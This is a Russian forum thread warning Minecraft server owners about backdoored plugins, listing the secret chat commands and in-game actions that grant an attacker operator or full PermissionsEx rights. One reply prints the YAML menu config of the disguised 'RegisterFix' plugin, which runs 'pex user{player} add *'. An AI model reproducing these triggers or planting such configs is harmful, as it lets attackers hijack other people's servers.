Список плагинов с уязвимостями

17 июня 2016 - 02:23
Вы не авторизованы, войдите на сайт.

просмотров 17389 | ответов 9

Описание:Некоторые плагины созданы специально для того, чтобы злоумышленник мог получить админку на сервере, на котором установлен плагин с уязвимостью.
Способы получения админок очень разные и хитрые.
Например: зайдя на сервер с таким плагином, злоумышленник может ударить три раза по траве каким-нибудь определённым блоком, а после этого прописать определённую команду и он автоматически становится или оператором, или получает самую главную группу в плагине PermissionsEX.Список:
1. aAntiSpam_v1.1 - способ взлома пока не известен.
2. Dupe - способ взлома пока не известен.
3. FloodProtect - Ударить по грязи три раза и прописать в чате команду /fp help 18971712
4. AntiBot - Берем рычаг в руки и нажимаем ПКМ.
5. Ural Paspport - Прописать в чате команду /passport 2 раза и нажать в инвентаре по нужным ячейкам. Скрин.
6. HypixelPets - Прописать в чате команду /nethernetwork2skingworld76 (не проверено).
7. ProtocolLibFix - Прописать команду /protocollibfix:autoworld (Не проверено). /CM проверить есть ли плагин, потом крафтим табличку и пишем CMBest в чате появится: " у вас * ник: Поздравляю".
8. RegisterFix - Появляется меню ChestCommands, кликнуть на определённый предмет в меню.
9. BukkitApiEnhancer - Написать в чат /xhomexx (Не проверено).

[b]Описание[/b]:Некоторые плагины созданы специально для того, чтобы злоумышленник мог получить админку на сервере, на котором установлен плагин с уязвимостью.
Способы получения админок очень разные и хитрые.
Например: зайдя на сервер с таким плагином, злоумышленник может ударить три раза по траве каким-нибудь определённым блоком, а после этого прописать определённую команду и он автоматически становится или оператором, или получает самую главную группу в плагине PermissionsEX.Список:
1. [color=#0000ff]aAntiSpam_v1.1[/color][color=#8896a0] - способ взлома пока не известен.[/color]
2. [color=#0000ff]Dupe [/color][color=#8896a0]- способ взлома пока не известен.[/color]
3. [color=#0000ff]FloodProtect [/color][color=#8896a0]- Ударить по грязи три раза и прописать в чате команду /fp help 18971712[/color]
4. [color=#0000ff]AntiBot [/color][color=#8896a0]- Берем рычаг в руки и нажимаем ПКМ.[/color]
5. [color=#0000ff]Ural Paspport[/color][color=#8896a0] - Прописать в чате команду /passport 2 раза и нажать в инвентаре по нужным ячейкам. [/color][url=https://zorotex.org/kartinki/screen2.png]Скрин[/url][color=#8896a0].[/color]
6. [color=#0000ff]HypixelPets[/color][color=#8896a0] - Прописать в чате команду /nethernetwork2skingworld76 (не проверено).[/color]
7. [color=#0000ff]ProtocolLibFix [/color][color=#8896a0]- Прописать команду /protocollibfix:autoworld (Не проверено). /CM проверить есть ли плагин, потом крафтим табличку и пишем CMBest в чате появится: " у вас * ник: Поздравляю".[/color]
[color=#999999]8.[/color] [color=#0000ff]RegisterFix [/color][color=#666666]- [/color][color=#999999]Появляется меню ChestCommands, кликнуть на определённый предмет в меню.
[/color]9. [color=#0000ff]BukkitApiEnhancer - [/color][color=#999999]Написать в чат /xhomexx (Не проверено).[/color]

14 апреля 2017 - 19:58

Появился еще один плагин с уязвимостью RegisterFix

14 апреля 2017 - 19:59

alex gamer сказал(а):
Появился еще один плагин с уязвимостью RegisterFix
Какой способ взлома?

14 апреля 2017 - 20:08

Сергей TU154 сказал(а):
Какой способ взлома? 
Способ взлома пока что не известен, мне ее скинули чтобы я ее установил за покупку доната. Я сделал вид что установил этот плагин, и потом мне написал этот человек что я не установил ее. После этого я ему написал на проверку что плагин с уязвимостью он начал грубить и добавил в ЧС. Могу скинуть этот плагин...

14 апреля 2017 - 20:13

Сергей TU154 сказал(а):
Какой способ взлома? Нашел способ взлома!! Это переделанный ChestCommands только

menu-settings:
  name: '&cВзлом опки.'
  rows: 1
  command:'register110011110'
aa4:
  COMMAND:'tell:&3Админка взломана!;console:pex user{player} add *'
  NAME: '&eВзлом админки'
  LORE:
    - ''
  ID: '264'
  POSITION-X: 5
  POSITION-Y: 1

14 апреля 2017 - 20:18

Добавил в список.

23 августа 2017 - 15:06

Выход из всех ситуации настолько прост. Что нужно делать чтобы не было проблем с сервером: 1. Самим собирать сборку сервера 2. Устанавливать плагины он зарубежных авторов или от наших но только проверенных 3. Доверять свой сервер проверенным людям( то есть выдать администратора или оператора)4. Никому не давать доступ к своей сборке/консоли сервера. 5. 5 раз перечитать функционал плагина перед его установкой на сервер !!

14 марта 2018 - 20:32

Спасибо, вам за этот список хак плагинов теперь я хоть не много обезопасил свой сервер от взлома опки!

14 марта 2018 - 21:33

Женя Жека228 сказал(а):
Спасибо, вам за этот список хак плагинов теперь я хоть не много обезопасил свой сервер от взлома опки!
Это ещё не весь список, есть и другие, так что будьте осторожнее.

Вова
27 мая 2019 - 09:37

alex,  Боже все норм у меня стоит плагин за щита от взлома опки и рех и все все команды проверил не работаеют у меня пишут нет таокй команды + я за претил всем писать команду help так как она иметь просомтр плагинов